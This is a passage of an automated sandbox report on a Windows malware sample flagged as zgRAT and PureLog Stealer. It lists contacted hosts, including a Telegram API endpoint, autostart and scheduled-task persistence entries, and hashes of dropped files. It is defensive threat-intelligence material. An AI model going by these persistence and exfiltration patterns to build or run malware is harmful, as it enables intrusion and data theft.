                                                        		unknown
                                                        https://contoso.com/Iconpowershell.exe, 0000001E.00000002.2908253954.000001A767156000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=XrKvE5hfPM.49.drfalse
                                                          		high
                                                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=XrKvE5hfPM.49.drfalse
                                                            		high
                                                            https://www.ecosia.org/newtab/XrKvE5hfPM.49.drfalse
                                                              		high
                                                              https://ion=v4.5Consumerspowershell.exe, 0000001A.00000002.3163703892.0000014AE8FD0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		low
                                                                https://github.com/Pester/Pesterpowershell.exe, 0000001E.00000002.1794173994.000001A757308000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://ipinfo.ioW4tW72sfAD.exe, 00000000.00000002.1734047255.00000000037B4000.00000004.00000800.00020000.00000000.sdmp, W4tW72sfAD.exe, 00000000.00000002.1734047255.0000000003702000.00000004.00000800.00020000.00000000.sdmp, W4tW72sfAD.exe, 00000000.00000002.1734047255.000000000378A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://ac.ecosia.org/autocomplete?q=XrKvE5hfPM.49.drfalse
                                                                      		high
                                                                      https://g.live.com/odclientsettings/Prod.C:svchost.exe, 00000033.00000003.2049334674.000001F0A8E1E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://ion=v4.5powershell.exe, 00000018.00000002.3244405482.0000023E3B510000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		low
                                                                          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchXrKvE5hfPM.49.drfalse
                                                                            		high
                                                                            http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000017.00000002.1826108573.000002B82F5C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1821605110.0000023E23358000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1821229291.0000014AD0EB8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1786007812.0000013AC39B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1794173994.000001A757308000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://contoso.com/powershell.exe, 0000001E.00000002.2908253954.000001A767156000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              		unknown
                                                                              https://nuget.org/nuget.exepowershell.exe, 00000017.00000002.3013188018.000002B83F416000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2977777373.0000023E331A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2830656459.0000013AD3805000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2908253954.000001A767156000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://crl.micft.cMicRosofpowershell.exe, 0000001A.00000002.3124943366.0000014AE8DD7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		unknown
                                                                                  https://aka.ms/pscore68powershell.exe, 00000017.00000002.1826108573.000002B82F3A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1821605110.0000023E23131000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1821229291.0000014AD0C91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1786007812.0000013AC3791000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1794173994.000001A7570E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://api.telegram.orgW4tW72sfAD.exe, 00000000.00000002.1734047255.000000000384B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameW4tW72sfAD.exe, 00000000.00000002.1734047255.0000000003224000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1826108573.000002B82F3A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1821605110.0000023E23131000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1821229291.0000014AD0C91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1786007812.0000013AC3791000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1794173994.000001A7570E1000.00000004.00000800.00020000.00000000.sdmp, juptXkyeRvGsIZrQGeVEsrnWhD.exe, 0000002C.00000002.2085622386.0000000003AA4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=XrKvE5hfPM.49.drfalse
                                                                                          		high
                                                                                          http://crl.microspowershell.exe, 00000017.00000002.3244330908.000002B847530000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          		unknown

                                                                                          World Map of Contacted IPs

                                                                                          • No. of IPs < 25%
                                                                                          • 25% < No. of IPs < 50%
                                                                                          • 50% < No. of IPs < 75%
                                                                                          • 75% < No. of IPs

                                                                                          Public IPs

                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                          34.117.186.192
                                                                                          		ipinfo.ioUnited States
                                                                                          		139070GOOGLE-AS-APGoogleAsiaPacificPteLtdSGfalse
                                                                                          149.154.167.220
                                                                                          		api.telegram.orgUnited Kingdom
                                                                                          		62041TELEGRAMRUfalse
                                                                                          172.67.189.92
                                                                                          		unknownUnited States
                                                                                          		13335CLOUDFLARENETUSfalse
                                                                                          104.21.57.61
                                                                                          		minecrafthyipixel.xyzUnited States
                                                                                          		13335CLOUDFLARENETUStrue

                                                                                          Private

                                                                                          IP
                                                                                          127.0.0.1

                                                                                          General Information

                                                                                          Joe Sandbox version:40.0.0 Tourmaline
                                                                                          Analysis ID:1428727
                                                                                          Start date and time:2024-04-19 13:41:05 +02:00
                                                                                          Joe Sandbox product:CloudBasic
                                                                                          Overall analysis duration:0h 12m 55s
                                                                                          Hypervisor based Inspection enabled:false
                                                                                          Report type:full
                                                                                          Cookbook file name:default.jbs
                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                          Number of analysed new started processes analysed:55
                                                                                          Number of new started drivers analysed:0
                                                                                          Number of existing processes analysed:0
                                                                                          Number of existing drivers analysed:0
                                                                                          Number of injected processes analysed:1
                                                                                          Technologies:
                                                                                          • HCA enabled
                                                                                          • EGA enabled
                                                                                          • AMSI enabled
                                                                                          Analysis Mode:default
                                                                                          Analysis stop reason:Timeout
                                                                                          Sample name:W4tW72sfAD.exe
                                                                                          renamed because original name is a hash value
                                                                                          Original Sample Name:9026338FCE277581062754CAB87462E7.exe
                                                                                          Detection:MAL
                                                                                          Classification:mal100.spre.troj.spyw.expl.evad.winEXE@45/93@4/5
                                                                                          EGA Information:
                                                                                          • Successful, ratio: 57.1%
                                                                                          HCA Information:
                                                                                          • Successful, ratio: 59%
                                                                                          • Number of executed functions: 326
                                                                                          • Number of non-executed functions: 10
                                                                                          Cookbook Comments:
                                                                                          • Found application associated with file extension: .exe

                                                                                          Warnings

                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, consent.exe, SIHClient.exe, conhost.exe, schtasks.exe, svchost.exe
                                                                                          • Excluded IPs from analysis (whitelisted): 23.201.212.130
                                                                                          • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
                                                                                          • Execution Graph export aborted for target juptXkyeRvGsIZrQGeVEsrnWhD.exe, PID 8172 because it is empty
                                                                                          • Execution Graph export aborted for target powershell.exe, PID 3668 because it is empty
                                                                                          • Execution Graph export aborted for target powershell.exe, PID 5104 because it is empty
                                                                                          • Execution Graph export aborted for target powershell.exe, PID 7140 because it is empty
                                                                                          • Execution Graph export aborted for target powershell.exe, PID 7208 because it is empty
                                                                                          • Execution Graph export aborted for target powershell.exe, PID 7248 because it is empty
                                                                                          • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                          • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                          • Report size getting too big, too many NtCreateKey calls found.
                                                                                          • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                          • Report size getting too big, too many NtOpenFile calls found.
                                                                                          • Report size getting too big, too many NtOpenKey calls found.
                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                          • VT rate limit hit for: W4tW72sfAD.exe

                                                                                          Simulations

                                                                                          Behavior and APIs

                                                                                          TimeTypeDescription
                                                                                          12:41:58Task SchedulerRun new task: juptXkyeRvGsIZrQGeVEsrnWhD path: "C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe"
                                                                                          12:41:58Task SchedulerRun new task: juptXkyeRvGsIZrQGeVEsrnWhDj path: "C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe"
                                                                                          12:41:58Task SchedulerRun new task: RuntimeBroker path: "C:\Users\Public\Downloads\RuntimeBroker.exe"
                                                                                          12:41:58Task SchedulerRun new task: RuntimeBrokerR path: "C:\Users\Public\Downloads\RuntimeBroker.exe"
                                                                                          12:42:00AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run juptXkyeRvGsIZrQGeVEsrnWhD "C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe"
                                                                                          12:42:11AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run RuntimeBroker "C:\Users\Public\Downloads\RuntimeBroker.exe"
                                                                                          12:42:19AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run juptXkyeRvGsIZrQGeVEsrnWhD "C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe"
                                                                                          12:42:28AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run RuntimeBroker "C:\Users\Public\Downloads\RuntimeBroker.exe"
                                                                                          12:42:37AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run juptXkyeRvGsIZrQGeVEsrnWhD "C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe"
                                                                                          12:42:45AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run RuntimeBroker "C:\Users\Public\Downloads\RuntimeBroker.exe"
                                                                                          12:43:03AutostartRun: WinLogon Shell "C:\Program Files\Microsoft Office 15\ClientX64\juptXkyeRvGsIZrQGeVEsrnWhD.exe"
                                                                                          12:43:11AutostartRun: WinLogon Shell "C:\Users\Default User\juptXkyeRvGsIZrQGeVEsrnWhD.exe"
                                                                                          12:43:21AutostartRun: WinLogon Shell "C:\Users\Public\Downloads\RuntimeBroker.exe"
                                                                                          12:43:29AutostartRun: WinLogon Shell "C:\Program Files (x86)\internet explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exe"
                                                                                          12:43:38AutostartRun: WinLogon Shell "C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe"
                                                                                          13:41:58API Interceptor30x Sleep call for process: W4tW72sfAD.exe modified
                                                                                          13:42:02API Interceptor168x Sleep call for process: powershell.exe modified
                                                                                          13:42:33API Interceptor2060411x Sleep call for process: juptXkyeRvGsIZrQGeVEsrnWhD.exe modified
                                                                                          13:42:34API Interceptor2x Sleep call for process: svchost.exe modified

                                                                                          Joe Sandbox View / Context

                                                                                          IPs

                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          34.117.186.192SecuriteInfo.com.Win32.Evo-gen.24318.16217.exeGet hashmaliciousUnknownBrowse
                                                                                          • ipinfo.io/json
                                                                                          SecuriteInfo.com.Win32.Evo-gen.28489.31883.exeGet hashmaliciousUnknownBrowse
                                                                                          • ipinfo.io/json
                                                                                          Raptor.HardwareService.Setup 1.msiGet hashmaliciousUnknownBrowse
                                                                                          • ipinfo.io/ip
                                                                                          Conferma_Pdf_Editor.exeGet hashmaliciousPlanet StealerBrowse
                                                                                          • ipinfo.io/
                                                                                          Conferma_Pdf_Editor.exeGet hashmaliciousPlanet StealerBrowse
                                                                                          • ipinfo.io/
                                                                                          w.shGet hashmaliciousXmrigBrowse
                                                                                          • /ip
                                                                                          Raptor.HardwareService.Setup_2.3.6.0.msiGet hashmaliciousUnknownBrowse
                                                                                          • ipinfo.io/ip
                                                                                          Raptor.HardwareService.Setup_2.3.6.0.msiGet hashmaliciousUnknownBrowse
                                                                                          • ipinfo.io/ip
                                                                                          uUsgzQ3DoW.exeGet hashmaliciousRedLineBrowse
                                                                                          • ipinfo.io/ip
                                                                                          8BZBgbeCcz.exeGet hashmaliciousRedLineBrowse
                                                                                          • ipinfo.io/ip
                                                                                          149.154.167.220s.exeGet hashmaliciousUnknownBrowse
                                                                                            s.exeGet hashmaliciousUnknownBrowse
                                                                                              DHL.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                Sp#U251c#U0434ti.exeGet hashmaliciousDanaBotBrowse
                                                                                                  Sp#U251c#U0434ti.exeGet hashmaliciousUnknownBrowse
                                                                                                    s.exeGet hashmaliciousUnknownBrowse
                                                                                                      pQTmpNQX2u.exeGet hashmaliciousDCRatBrowse
                                                                                                        Sp#U251c#U0434ti.exeGet hashmaliciousUnknownBrowse
                                                                                                          Sp#U251c#U0434ti.exeGet hashmaliciousUnknownBrowse
                                                                                                            cc.exeGet hashmaliciousUnknownBrowse
                                                                                                              104.21.57.611.vbsGet hashmaliciousGuLoader, RemcosBrowse

                                                                                                                Domains

                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                ipinfo.ios.exeGet hashmaliciousUnknownBrowse
                                                                                                                • 34.117.186.192
                                                                                                                s.exeGet hashmaliciousUnknownBrowse
                                                                                                                • 34.117.186.192
                                                                                                                s2dwlCsA95.exeGet hashmaliciousRisePro StealerBrowse
                                                                                                                • 34.117.186.192
                                                                                                                Sp#U251c#U0434ti.exeGet hashmaliciousDanaBotBrowse
                                                                                                                • 34.117.186.192
                                                                                                                Sp#U251c#U0434ti.exeGet hashmaliciousUnknownBrowse
                                                                                                                • 34.117.186.192
                                                                                                                SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeGet hashmaliciousAmadey, RedLine, RisePro StealerBrowse
                                                                                                                • 34.117.186.192
                                                                                                                s.exeGet hashmaliciousUnknownBrowse
                                                                                                                • 34.117.186.192
                                                                                                                UeW2b6mU6Z.exeGet hashmaliciousAmadey, RisePro StealerBrowse
                                                                                                                • 34.117.186.192
                                                                                                                pQTmpNQX2u.exeGet hashmaliciousDCRatBrowse
                                                                                                                • 34.117.186.192
                                                                                                                file.exeGet hashmaliciousRisePro StealerBrowse
                                                                                                                • 34.117.186.192
                                                                                                                api.telegram.orgs.exeGet hashmaliciousUnknownBrowse
                                                                                                                • 149.154.167.220
                                                                                                                s.exeGet hashmaliciousUnknownBrowse
                                                                                                                • 149.154.167.220
                                                                                                                DHL.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                • 149.154.167.220
                                                                                                                Sp#U251c#U0434ti.exeGet hashmaliciousDanaBotBrowse
                                                                                                                • 149.154.167.220
                                                                                                                Sp#U251c#U0434ti.exeGet hashmaliciousUnknownBrowse
                                                                                                                • 149.154.167.220
                                                                                                                s.exeGet hashmaliciousUnknownBrowse
                                                                                                                • 149.154.167.220
                                                                                                                pQTmpNQX2u.exeGet hashmaliciousDCRatBrowse
                                                                                                                • 149.154.167.220
                                                                                                                Sp#U251c#U0434ti.exeGet hashmaliciousUnknownBrowse
                                                                                                                • 149.154.167.220
                                                                                                                Sp#U251c#U0434ti.exeGet hashmaliciousUnknownBrowse
                                                                                                                • 149.154.167.220
                                                                                                                cc.exeGet hashmaliciousUnknownBrowse
                                                                                                                • 149.154.167.220

                                                                                                                ASNs

                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                TELEGRAMRUs.exeGet hashmaliciousUnknownBrowse
                                                                                                                • 149.154.167.220
                                                                                                                s.exeGet hashmaliciousUnknownBrowse
                                                                                                                • 149.154.167.220
                                                                                                                DHL.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                • 149.154.167.220
                                                                                                                Sp#U251c#U0434ti.exeGet hashmaliciousDanaBotBrowse
                                                                                                                • 149.154.167.220
                                                                                                                Sp#U251c#U0434ti.exeGet hashmaliciousUnknownBrowse
                                                                                                                • 149.154.167.220
                                                                                                                s.exeGet hashmaliciousUnknownBrowse
                                                                                                                • 149.154.167.220
                                                                                                                New Soft Update.exeGet hashmaliciousUnknownBrowse
                                                                                                                • 149.154.167.99
                                                                                                                pQTmpNQX2u.exeGet hashmaliciousDCRatBrowse
                                                                                                                • 149.154.167.220
                                                                                                                Sp#U251c#U0434ti.exeGet hashmaliciousUnknownBrowse
                                                                                                                • 149.154.167.220
                                                                                                                Sp#U251c#U0434ti.exeGet hashmaliciousUnknownBrowse
                                                                                                                • 149.154.167.220
                                                                                                                CLOUDFLARENETUSUMMAN #U0130HRACAT AFR5641 910-1714 1633.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                • 172.67.191.112
                                                                                                                http://www.pdfconvertercompare.comGet hashmaliciousUnknownBrowse
                                                                                                                • 172.67.69.183
                                                                                                                7oIrVgpQFQ.elfGet hashmaliciousMiraiBrowse
                                                                                                                • 172.67.166.61
                                                                                                                n4J9NMfLTM.elfGet hashmaliciousMiraiBrowse
                                                                                                                • 172.67.166.61
                                                                                                                4wngRroxli.elfGet hashmaliciousMiraiBrowse
                                                                                                                • 104.21.75.8
                                                                                                                igIKGnfg87.elfGet hashmaliciousMiraiBrowse
                                                                                                                • 104.21.75.8
                                                                                                                XKVTy6USx5.elfGet hashmaliciousMiraiBrowse
                                                                                                                • 104.21.75.8
                                                                                                                Play_NewMessage_17April2024_Audio.htmGet hashmaliciousUnknownBrowse
                                                                                                                • 104.17.2.184
                                                                                                                Invoice No. 03182024.docxGet hashmaliciousRemcosBrowse
                                                                                                                • 172.67.215.45
                                                                                                                $RWRW8GN.exeGet hashmaliciousUnknownBrowse
                                                                                                                • 104.22.1.235
                                                                                                                GOOGLE-AS-APGoogleAsiaPacificPteLtdSGs.exeGet hashmaliciousUnknownBrowse
                                                                                                                • 34.117.186.192
                                                                                                                s.exeGet hashmaliciousUnknownBrowse
                                                                                                                • 34.117.186.192
                                                                                                                s2dwlCsA95.exeGet hashmaliciousRisePro StealerBrowse
                                                                                                                • 34.117.186.192
                                                                                                                Sp#U251c#U0434ti.exeGet hashmaliciousDanaBotBrowse
                                                                                                                • 34.117.186.192
                                                                                                                Sp#U251c#U0434ti.exeGet hashmaliciousUnknownBrowse
                                                                                                                • 34.117.186.192
                                                                                                                SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeGet hashmaliciousAmadey, RedLine, RisePro StealerBrowse
                                                                                                                • 34.117.186.192
                                                                                                                lQV0SgKoqe.exeGet hashmaliciousUnknownBrowse
                                                                                                                • 34.117.118.44
                                                                                                                lQV0SgKoqe.exeGet hashmaliciousUnknownBrowse
                                                                                                                • 34.117.118.44
                                                                                                                s.exeGet hashmaliciousUnknownBrowse
                                                                                                                • 34.117.186.192
                                                                                                                SecuriteInfo.com.Win64.Evo-gen.32634.31069.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro StealerBrowse
                                                                                                                • 34.117.186.192
                                                                                                                CLOUDFLARENETUSUMMAN #U0130HRACAT AFR5641 910-1714 1633.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                • 172.67.191.112
                                                                                                                http://www.pdfconvertercompare.comGet hashmaliciousUnknownBrowse
                                                                                                                • 172.67.69.183
                                                                                                                7oIrVgpQFQ.elfGet hashmaliciousMiraiBrowse
                                                                                                                • 172.67.166.61
                                                                                                                n4J9NMfLTM.elfGet hashmaliciousMiraiBrowse
                                                                                                                • 172.67.166.61
                                                                                                                4wngRroxli.elfGet hashmaliciousMiraiBrowse
                                                                                                                • 104.21.75.8
                                                                                                                igIKGnfg87.elfGet hashmaliciousMiraiBrowse
                                                                                                                • 104.21.75.8
                                                                                                                XKVTy6USx5.elfGet hashmaliciousMiraiBrowse
                                                                                                                • 104.21.75.8
                                                                                                                Play_NewMessage_17April2024_Audio.htmGet hashmaliciousUnknownBrowse
                                                                                                                • 104.17.2.184
                                                                                                                Invoice No. 03182024.docxGet hashmaliciousRemcosBrowse
                                                                                                                • 172.67.215.45
                                                                                                                $RWRW8GN.exeGet hashmaliciousUnknownBrowse
                                                                                                                • 104.22.1.235

                                                                                                                JA3 Fingerprints

                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                3b5074b1b5d032e5620f69f9f700ff0ehttp://www.sushi-idea.comGet hashmaliciousUnknownBrowse
                                                                                                                • 34.117.186.192
                                                                                                                • 149.154.167.220
                                                                                                                Receipt_032114005.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                • 34.117.186.192
                                                                                                                • 149.154.167.220
                                                                                                                DHL.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                • 34.117.186.192
                                                                                                                • 149.154.167.220
                                                                                                                eInvoicing_pdf.vbsGet hashmaliciousFormBookBrowse
                                                                                                                • 34.117.186.192
                                                                                                                • 149.154.167.220
                                                                                                                KjCBSM7Ukv.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                                                                                                                • 34.117.186.192
                                                                                                                • 149.154.167.220
                                                                                                                eO2bqORIJb.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                • 34.117.186.192
                                                                                                                • 149.154.167.220
                                                                                                                SecuriteInfo.com.Program.Unwanted.5412.9308.3353.exeGet hashmaliciousPureLog StealerBrowse
                                                                                                                • 34.117.186.192
                                                                                                                • 149.154.167.220
                                                                                                                SecuriteInfo.com.Trojan.KillProc2.23108.29569.31585.exeGet hashmaliciousUnknownBrowse
                                                                                                                • 34.117.186.192
                                                                                                                • 149.154.167.220
                                                                                                                https://netflixfreeprimeofficle.blogspot.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                • 34.117.186.192
                                                                                                                • 149.154.167.220
                                                                                                                KZWCMNWmmqi9lvI.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                • 34.117.186.192
                                                                                                                • 149.154.167.220

                                                                                                                Dropped Files

                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                C:\Users\user\Desktop\BazpdGXT.log8CDSiIApNr.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                  3otr19d5Oq.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                    idYLOQOVSi.exeGet hashmaliciousDCRatBrowse
                                                                                                                      ZAF4Dsu737.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                        mbsPX9l9Ge.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                          nxs4if1qOO.exeGet hashmaliciousDCRatBrowse
                                                                                                                            crsa4bZhdH.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                              C9EBSy2FG0.exeGet hashmaliciousDCRatBrowse
                                                                                                                                y3HHIzAW6R.exeGet hashmaliciousDCRatBrowse
                                                                                                                                  SecuriteInfo.com.HEUR.Trojan.MSIL.Agent.gen.4285.13890.exeGet hashmaliciousDCRatBrowse

                                                                                                                                    Created / dropped Files

                                                                                                                                    C:\Program Files (x86)\Internet Explorer\en-GB\9da3c047e935b1

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Users\user\Desktop\W4tW72sfAD.exe
                                                                                                                                    File Type:ASCII text, with very long lines (857), with no line terminators
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):857
                                                                                                                                    Entropy (8bit):5.87587225954941
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:24:vQ1CzqXTp4eRjIfXOGLjA7nlE+HX2hMHIZOZVXQZ1Hp:vQrjynLjA7CRMHISIHp
                                                                                                                                    MD5:20AF770A33983F64E4A34CB4D1D9EC20
                                                                                                                                    SHA1:832430EDC0F3A4ABDDB0A692091AE35B00EB2FDE
                                                                                                                                    SHA-256:E31E28EA16C90F10B56878DF37D66EB9086F3BC295553500942C02BDD989DF7C
                                                                                                                                    SHA-512:D987DC72714DAF507D6819182E0F299F1A02DAB203B6B2AD7FDA998CF77AD4406C46D2D41F2D3533572A62B85774AB7994D5E5011D98AF17849656A45C42C159
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:sUzB2yKujfEuB7VvyU8YrAHPS1pwouvVSjqu32cqb6gVOv7U4etzGjJsMktAIYGyusbbRl262R7udvAg4U2KB6PsZ8hSJciC0slgTfDTlx6ymYPbjMFyf5xxctBTDjwZt44uJdMZRjjO9aGBtGt6Wuh54yDkduPBAhFseeRFAqg6WjxBmAk60zD9X90VZl5hThNcVYhOyn6qNliVAC8dKSLLeFVfn6pYv9mzWVqNdVIM2WwvaeVXnbWAVB8PDCl27i4O8t9oVuAzK8SHTjEJkSuTmldUXaKauQPUbhxqfqB3bh0Wt06e7bRpxllWQoR5jjF4t7pvvYn3Q12EvGkgeqdS8kg06aa0ZGT1c5nvLKsiyXZ5shlJEua3Fw5IazzV8xeJiAlzcyVU75ekLlHZyQwpqZvpAfVVUWkA3PXs5wqPYG6KSU7zragrAzdJO6z7d99kUdr5NZdCkhQjckXphfo4z2AEwNd96svZGV0znBlS6eGdi3qnjJZ7VFubdnJA5eF1v1dHuhCg4V7Vvgf3hzaxSxDBkYWA2lWcYPsraj3BH3DAHZq6HPcGESj7xbgWLCnS8f6gxxd86YqZtC4LsZ2mIQXGpv38Cg0EPvBlcJJTweKplKNvgUovJAJsH00C4e5ZilJ8BSsiQj0oGsefhIcs1E5PlSemSGZRjuGABOtNmFfkKfmZVVevCNiep3WsyGQJKiFVldeTZOFviVFGqFQ6mnPWLmUH2AYfyWZlaQx10LWxHw5UyPCt0TggTsJ8JXbY0k6L5dqZRYGbQcOZq9Sm8ppf02RrGysdu87gzuYUjncbNFP0euSJEzZK4bVCL9SdpmqSfrj6l7CVMORumbNWg

                                                                                                                                    C:\Program Files (x86)\Internet Explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exe

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Users\user\Desktop\W4tW72sfAD.exe
                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):2079744
                                                                                                                                    Entropy (8bit):7.6230020226991435
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:24576:aSLLyDf1/7HnFZnA83kJTwJiYYfbeQYPXI3IDyVZqVhTEmkz3UzKzMlJ6wwLI:aSXM/dUJ8SDeQYvI3IGmhTZYlwlJJM
                                                                                                                                    MD5:9026338FCE277581062754CAB87462E7
                                                                                                                                    SHA1:191B8D92C18B84FDEF03F691583D8B89598CB7DA
                                                                                                                                    SHA-256:5565710131F195B46FB7C0B124D16DF72EC5E0AAFDD22590EAFF7885AEAD636F
                                                                                                                                    SHA-512:8BE58979EEC71FE69408AA621E756D76B58DB496DA456DAD533FB88AD800ECF8D8E5933BAEDDA4742C1DC4E5095F8FE7C3071F0339B056F54A378ADB08908FCA
                                                                                                                                    Malicious:true
                                                                                                                                    Yara Hits:
                                                                                                                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Internet Explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exe, Author: Joe Security
                                                                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Internet Explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exe, Author: Joe Security
                                                                                                                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Internet Explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exe, Author: Joe Security
                                                                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Internet Explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exe, Author: Joe Security
                                                                                                                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Internet Explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exe, Author: Joe Security
